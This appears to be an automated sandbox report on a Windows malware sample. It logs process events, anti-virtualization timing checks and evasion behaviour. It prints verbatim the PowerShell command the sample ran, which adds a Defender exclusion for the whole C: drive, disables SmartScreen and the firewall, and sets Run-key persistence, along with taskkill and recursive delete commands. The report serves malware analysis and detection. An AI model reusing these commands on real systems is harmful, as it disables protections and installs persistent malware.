      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\UpSys.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeRDTSC instruction interceptor: First address: 000000014041BE4A second address: 000000014041BE66 instructions: 0x00000000 rdtsc 0x00000002 inc sp 0x00000004 cmovs ebx, eax 0x00000007 inc ecx 0x00000008 pop eax 0x00000009 dec eax 0x0000000a cwde 0x0000000b inc esp 0x0000000c movzx esp, si 0x0000000f inc ecx 0x00000010 pop edx 0x00000011 dec esp 0x00000012 cmovs ebx, ecx 0x00000015 inc ebp 0x00000016 movzx esp, bp 0x00000019 inc ecx 0x0000001a pop ebx 0x0000001b cwde 0x0000001c rdtsc
      Source: C:\ProgramData\MicrosoftNetwork\System.exeRDTSC instruction interceptor: First address: 000000014041BE4A second address: 000000014041BE66 instructions: 0x00000000 rdtsc 0x00000002 inc sp 0x00000004 cmovs ebx, eax 0x00000007 inc ecx 0x00000008 pop eax 0x00000009 dec eax 0x0000000a cwde 0x0000000b inc esp 0x0000000c movzx esp, si 0x0000000f inc ecx 0x00000010 pop edx 0x00000011 dec esp 0x00000012 cmovs ebx, ecx 0x00000015 inc ebp 0x00000016 movzx esp, bp 0x00000019 inc ecx 0x0000001a pop ebx 0x0000001b cwde 0x0000001c rdtsc
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exe TID: 7008Thread sleep time: -7200000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5980Thread sleep time: -1844674407370954s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6772Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6764Thread sleep time: -4611686018427385s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6764Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5876Thread sleep time: -7378697629483816s >= -30000s
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeThread delayed: delay time: 3600000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7591Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 439Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7531
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3979
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 721
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 662
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeThread delayed: delay time: 3600000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\
      Source: bQQHP9ciRL.exe, 00000000.00000000.517136127.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000000.498170139.000000000063B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
      Source: C:\ProgramData\UpSys.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\ProgramData\UpSys.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\ProgramData\UpSys.exeProcess token adjusted: Debug
      Source: C:\ProgramData\UpSys.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess queried: DebugPortJump to behavior
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess queried: DebugPortJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Adds a directory exclusion to Windows Defender
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)Jump to behavior
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)Jump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)Jump to behavior
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM mvsc32.exe /F Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM mvsc32.exe /F
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM mvsc32.exe /F
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)Jump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM mvsc32.exe /F && exitJump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exitJump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM mvsc32.exe /F && exitJump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM mvsc32.exe /F && exitJump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exitJump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\UpSys.exe "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state offJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM Jump to behavior
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)Jump to behavior
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
